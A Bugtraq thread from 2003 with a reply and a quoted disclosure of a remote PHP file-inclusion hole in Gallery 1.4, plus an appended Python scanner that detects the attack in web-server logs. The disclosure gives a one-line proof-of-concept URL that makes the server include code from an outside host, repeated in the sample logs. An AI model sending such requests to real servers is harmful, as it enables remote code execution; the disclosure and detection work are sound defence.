The URL you mention is accessible only during the setup of Gallery. After completing the installation, the user runs secure.sh or secure.bat, which does "chmod 0 setup", making the vulnerability you mention inaccessible to the web.

Brent Meshier
Global Transport Logistics, Inc.
2770 Fortune Circle Drive
Indianapolis, IN 46241
(317) 481-0527 x23 Direct
(317) 481-0177 Fax
http://www.gtlogistics.com/

-----Original Message-----
From: Peter Stöckli [mailto:pcs@rootquest.com]
Sent: Saturday, October 11, 2003 11:13 AM
To: bugtraq@securityfocus.com
Subject: Gallery 1.4 including file vulnerability

-Proof of concept-

It is possible to include any PHP file from a remote host and execute it on the target's server.

This works:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

If the file "http://tester/util.php" exists, it will be included.
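A detection example for the issue in this thread, added here and not part of either message or of the Gallery project: it scans web-server access log lines (Common Log Format is assumed; the sample lines are constructed) for requests to setup/index.php whose GALLERY_BASEDIR parameter points at a remote URL, including percent-encoded and mixed-case variants, so an administrator can see whether the setup directory was hit before it was locked down.

```python
"""Flag Gallery 1.4 setup/index.php remote-include attempts in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2003:11:13:02 +0200] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.0" 200 512
203.0.113.5 - - [11/Oct/2003:11:14:10 +0200] "GET /gallery/setup/index.php?GALLERY_BASEDIR=HTTP%3A%2F%2Ftester%2F HTTP/1.0" 200 512
198.51.100.7 - - [11/Oct/2003:11:20:00 +0200] "GET /gallery/setup/index.php HTTP/1.1" 403 210
192.0.2.9 - - [11/Oct/2003:12:00:00 +0200] "GET /gallery/view_photo.php?set_albumName=trip HTTP/1.1" 200 8192
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def is_remote_basedir(target: str) -> bool:
    """True if the request sets GALLERY_BASEDIR on setup/index.php to a remote URL.

    The value is URL-decoded (twice, to catch double encoding) and compared
    case-insensitively, since PHP's URL wrappers accept HTTP:// as well as http://.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/setup/index.php"):
        return False
    values = parse_qs(parts.query, keep_blank_values=True).get("GALLERY_BASEDIR", [])
    for value in values:
        decoded = unquote(unquote(value)).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client ip, request target, status) for each remote-include attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_remote_basedir(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, target, status in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {target} (HTTP {status})")
```

A 200 on such a request after installation means the setup directory was still reachable; a 403 on the plain setup/index.php request is what the chmod 0 step in the reply should produce.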